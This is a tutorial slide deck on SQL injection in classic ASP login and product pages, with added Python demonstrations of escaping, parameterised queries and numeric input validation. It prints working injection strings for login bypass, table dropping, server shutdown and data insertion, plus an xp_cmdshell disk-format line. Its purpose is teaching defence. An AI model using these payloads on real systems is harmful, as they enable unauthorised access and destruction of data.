SQL Injection Attacks
Siddhesh Bhobe
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
SQL Injection Attack…
…"injects" or manipulates SQL code using "string-building" techniques.
By adding unexpected SQL to a query, it is possible to manipulate a database in many unanticipated ways.
Attacks succeed because of poor input validation at the code layer.
Example 1: HTML Form
Consider the following HTML form for login:
<form name="frmLogin" action="login.asp" method="post">
  Username: <input type="text" name="userName">
  Password: <input type="text" name="password">
  <input type="submit">
</form>
Example 1: ASP Script
<%
…
' Form fields are read and concatenated straight into the SQL text (the vulnerable pattern)
userName = Request.Form("userName")
password = Request.Form("password")
query = "select count(*) from users where userName='" & userName & "' and userPass='" & password & "'"
…
%>
Sample Input
Login = john, Password = doe
select count(*) from users where userName='john' and userPass='doe'
Now check this!
Login = john, Password = ' or 1=1 --
select count(*) from users where userName='john' and userPass='' or 1=1 --'
The password check is nullified.
-- comments out the rest of the query, so the trailing quote does not produce a mismatched-quote error.
And what about this?
Username: ' or 1=1 -- and Password: [Empty]
select count(*) from users where userName='' or 1=1 --' and userPass=''
Example 2
Username: ' having 1=1 -- , Password: [Empty]
select userName from users where userName='' having 1=1
You get a column name…
You will get the following error message:
Microsoft OLE DB Provider for SQL Server (0x80040E14) Column 'users.userName' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/login.asp, line 16
The Attack…
Username: ' or users.userName like 'a%' --
select userName from users where userName='' or users.userName like 'a%' --' and userPass=''
Logged In As admin!!!
Use of Semi-colon
A semi-colon allows multiple queries to be specified on one line.
The statements are submitted as one batch and executed sequentially:
select 1; select 1+2; select 1+3;
Can you guess what happens?
Username: ' or 1=1; drop table users; --
Table dropped!
Username: ' or 1=1; drop table users; -- and Password: [Anything]
Firstly, it would select the userName field for all rows in the users table.
Secondly, it would drop the users table.
SHUTDOWN WITH NOWAIT!!
…causes SQL Server to shut down, immediately stopping the Windows service.
Username: '; shutdown with nowait; --
select userName from users where userName=''; shutdown with nowait; --' and userPass=''
Products.asp
http://localhost/products.asp?productId=1 returns Got product Pink Hoola Hoop
But what about this?
http://localhost/products.asp?productId=0;insert%20into%20products(prodName)%20values(left(@@version,50))
Wham!
Here's the query without the URL-encoded spaces:
http://localhost/products.asp?productId=0;insert into products(prodName) values(left(@@version,50))
This runs an INSERT on the products table, adding the first 50 characters of SQL Server's @@version variable as a new record in the products table.
Effects
Privilege Level: sa
Total control of SQL Server
OS Shell at privilege of MSSQLServer service using xp_cmdshell
Ability to read, write, mutilate all data
Effects
Privilege Level: db_owner
Read/write all data in affected database
Drop tables
Create new objects
Take control of the database
Effects
Privilege Level: normal user (no fixed server or database roles)
Access only to objects for which permission has been granted
At best, access to only a few stored procedures
At worst, read/write access to all tables
Recommended!
Testing for Vulnerability
Disable error handling so that errors are displayed
Input single quotes to see if the application fails
A failure indicates poor validation: the input has corrupted the SQL.
Preventing SQL Injection Attacks
Limit User Access
Escape Quotes
Remove culprit characters
Limit length of user input
Limit User Access
Do not use the "sa" account
Remove extended stored procedures (SPs) if you are not using them. The following are a couple of the most damaging ones:
xp_cmdshell
xp_grantlogin
Use SPs to abstract data access
Escape Quotes
Convert each single quote into two single quotes:
<%
function stripQuotes(strWords)
    ' Doubling the quote turns it back into literal data inside a SQL string
    stripQuotes = replace(strWords, "'", "''")
end function
%>
This converts
select count(*) from users where userName='john' and userPass='' or 1=1 --'
...to this:
select count(*) from users where userName='john'' and userPass=''' or 1=1 --'
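The login query from the slides, rebuilt in Python against an in-memory SQLite table (constructed sample data, not the deck's own code) so the three variants can be compared side by side: the original string-building, the same string-building after the slides' quote-escaping, and a parameterised query. The table and users are assumptions for the demonstration.

```python
import sqlite3

# Constructed stand-in for the slides' SQL Server "users" table.
conn = sqlite3.connect(":memory:")
conn.execute("create table users (userName text, userPass text)")
conn.execute("insert into users values ('john', 'doe'), ('admin', 's3cret')")
conn.commit()


def login_unsafe(user_name, password):
    """String-built query, exactly the pattern shown in login.asp (vulnerable)."""
    query = ("select count(*) from users where userName='" + user_name
             + "' and userPass='" + password + "'")
    return conn.execute(query).fetchone()[0] > 0


def strip_quotes(text):
    """Port of the slides' stripQuotes(): every single quote becomes two."""
    return text.replace("'", "''")


def login_escaped(user_name, password):
    """Same string-building, but with stripQuotes applied to both inputs first."""
    return login_unsafe(strip_quotes(user_name), strip_quotes(password))


def login_safe(user_name, password):
    """Parameterised query: the driver binds inputs as data, never as SQL text."""
    row = conn.execute(
        "select count(*) from users where userName=? and userPass=?",
        (user_name, password),
    ).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    payload = "' or 1=1 --"          # the password from the "Now check this!" slide
    print("unsafe  :", login_unsafe("john", payload))    # True: check nullified
    print("escaped :", login_escaped("john", payload))   # False
    print("safe    :", login_safe("john", payload))      # False
    print("real pw :", login_safe("john", "doe"))        # True
```

Parameterisation is the stronger of the two fixes: escaping protects only string contexts, while bound parameters also cover the numeric productId case where no quote is involved.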
Drop culprit characters
Drop character sequences like ;, --, insert and xp_
select prodName from products where id=1; xp_cmdshell 'format c: /q /yes '; drop database myDB; --
becomes
select prodName from products where id=1 cmdshell ''format c: /q /yes '' database myDB
Restrict length of user input
Limit the length in the form field
Use validating functions for numeric input
Use POST, not GET
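The products.asp case handled the way these two slides recommend, as an added example (not the deck's code): the productId parameter is length-limited and validated as a number before any SQL runs, and the lookup itself is parameterised. The in-memory products table, the 9-digit limit and the URL handling are assumptions for the demonstration.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the slides' products table.
conn = sqlite3.connect(":memory:")
conn.execute("create table products (id integer primary key, prodName text)")
conn.execute("insert into products values (1, 'Pink Hoola Hoop')")
conn.commit()

MAX_ID_LEN = 9                                   # assumed length limit for an id
_ID_RE = re.compile(r"^[0-9]{1,%d}$" % MAX_ID_LEN)


def parse_product_id(raw):
    """Validating function for numeric input: digits only, bounded length, positive."""
    if raw is None or not _ID_RE.match(raw):
        raise ValueError("productId must be 1-%d digits, got %r" % (MAX_ID_LEN, raw))
    product_id = int(raw)
    if product_id < 1:
        raise ValueError("productId must be positive, got %d" % product_id)
    return product_id


def product_name_for_url(url):
    """Handle a products.asp-style URL: extract productId, validate it, then look it up."""
    params = parse_qs(urlsplit(url).query)
    raw = params.get("productId", [None])[0]
    # Whether or not parse_qs splits the value at ';' (Python versions differ),
    # the injected batch from the slides never passes validation.
    product_id = parse_product_id(raw)
    row = conn.execute(
        "select prodName from products where id=?", (product_id,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(product_name_for_url("http://localhost/products.asp?productId=1"))
    try:
        product_name_for_url(
            "http://localhost/products.asp?productId=0;insert%20into%20products"
            "(prodName)%20values(left(@@version,50))")
    except ValueError as err:
        print("rejected:", err)
```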
Thanks!
Original Article:
http://www.webmasterbase.com/article.php?aid=794&pid=0
Also on Reismagos…